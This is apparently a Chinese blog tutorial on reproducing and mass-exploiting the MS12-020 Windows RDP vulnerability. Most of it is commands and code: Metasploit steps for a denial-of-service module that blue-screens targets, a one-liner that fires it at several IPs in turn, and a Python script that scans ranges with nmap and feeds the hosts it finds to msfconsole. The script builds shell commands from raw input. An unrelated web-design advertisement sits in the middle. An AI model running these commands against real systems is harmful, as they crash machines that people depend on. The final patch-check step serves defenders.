MS12-020漏洞复现及自动化批量利用
漏洞描述
Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)
影响目标
Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2
msfpayload利用
msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost
run
此pyload仅支持单目标。
创新互联-专业网站定制、快速模板网站建设、高性价比应县网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式应县网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖应县地区。费用合理售后完善,十载实体公司更值得信赖。
通过msfconsole快速启动
msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"
通过bash脚本批量生成检测脚本(nmap-port2ip.py)
#encoding:utf-8
import xml.sax
import sys
import os
class MovieHandler( xml.sax.ContentHandler ):
def __init__(self, filterport=None):
self.CurrentData = ""
self.port=filterport
self.data = ""
self.datas=[]
# 元素开始事件处理
def startElement(self, tag, attributes):
self.CurrentData = tag
if tag == "address":
self.data=attributes["addr"]
# 元素结束事件处理
def endElement(self, tag):
if self.CurrentData == "address":
self.datas.append(self.data)
self.data=""
self.CurrentData = ""
class Gather(object):
def __init__(self, filterport=None):
# 创建一个 XMLReader
self.parser = xml.sax.make_parser()
# turn off namepsaces
self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)
# 重写 ContextHandler
self.Handler = MovieHandler(filterport)
self.parser.setContentHandler( self.Handler )
def run(self, port):
self.Handler.datas=[]
self.parser.parse(port+".xml")
print(self.Handler.datas)
def get_ans(self):
return self.Handler.datas
if __name__ == "__main__":
if len(sys.argv) !=3:
os.exit()
os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
g = Gather()
g.run(sys.argv[2])
# create cmd
cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;'
ips = g.get_ans()
if len(ips)>0:
for ip in g.get_ans():
cmd += "set rhosts "+ip+";run;"
cmd += 'exit;"'
os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py
# 功能:针对某种服务的漏洞对指定IP段的所有主机进行检测,获取可能存在问题的主机IP,并调用对应的Msf Payload进行利用尝试。
# ip可支持单一IP、CIDR形式IP、10.129.1.1-154等几种,格式与nmap一致
# port仅支持单端口
漏洞补丁检测
systeminfo | find /i "KB2621440"
如果存在结果如下,证明已打补丁,否则,需要打对应的补丁。
Windows Server 2003补丁
参考文章
- 微软MS12-020
当前文章:MS12-020漏洞复现及自动化批量利用
文章路径:http://ybzwz.com/article/pephds.html